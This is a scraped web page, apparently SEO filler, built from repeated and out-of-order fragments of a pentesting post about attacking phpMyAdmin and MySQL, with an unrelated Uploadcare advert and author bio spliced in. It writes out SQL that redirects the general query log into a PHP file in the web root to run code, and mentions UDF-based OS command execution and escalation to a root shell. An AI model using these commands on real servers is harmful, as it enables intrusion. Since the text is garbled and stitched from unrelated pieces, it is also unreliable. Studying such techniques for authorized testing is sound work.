We compile a MySQL extension (UDF) that runs OS commands.
MySQL needs write permissions to that OS folder, and SELinux/AppArmor usually hates this. 3. When into outfile Fails: The Log File Hijack Modern setups block outfile . But we have a Plan B: General Query Log .
For a sysadmin, it’s a tool. For a pentester, it is often the endgame .
If you have FILE privileges or root access to MySQL, you can force the server to write PHP code into its own error log, then include that log via a Local File Inclusion (LFI).
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/hack.php'; SELECT '<?php phpinfo(); ?>'; Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective. You have root MySQL access, but you are a low-privilege OS user. How do we escalate?
This post is for educational purposes and authorized security testing only.
Published by: Security Tinkerer Reading time: 6 minutes
The next time you see that blue login screen, remember: it’s not just a database manager. It is often one SQL query away from a root shell. Want more "Hacktricks"? Check out the HackTricks GitHub repo for the ultimate cheat sheets.
Ready to get started?
Join developers who use Uploadcare to build file handling quickly and reliably.
Written by Trust Jamin Okpukoro
Trust Jamin Okpukoro is a Developer Advocate and Senior Technical Writer with a strong background in software engineering, community building, video creation, and public speaking. Over the past few years, he has consistently enhanced developer experiences across various tech products by creating impactful technical content and leading strategic initiatives. His work has helped increase product awareness, drive user engagement, boost sales, and position companies as thought leaders within their industries.
Phpmyadmin Hacktricks Online
We compile a MySQL extension (UDF) that runs OS commands.
MySQL needs write permissions to that OS folder, and SELinux/AppArmor usually hates this. 3. When into outfile Fails: The Log File Hijack Modern setups block outfile . But we have a Plan B: General Query Log .
For a sysadmin, it’s a tool. For a pentester, it is often the endgame . phpmyadmin hacktricks
If you have FILE privileges or root access to MySQL, you can force the server to write PHP code into its own error log, then include that log via a Local File Inclusion (LFI).
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/hack.php'; SELECT '<?php phpinfo(); ?>'; Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective. You have root MySQL access, but you are a low-privilege OS user. How do we escalate? We compile a MySQL extension (UDF) that runs OS commands
This post is for educational purposes and authorized security testing only.
Published by: Security Tinkerer Reading time: 6 minutes When into outfile Fails: The Log File Hijack
The next time you see that blue login screen, remember: it’s not just a database manager. It is often one SQL query away from a root shell. Want more "Hacktricks"? Check out the HackTricks GitHub repo for the ultimate cheat sheets.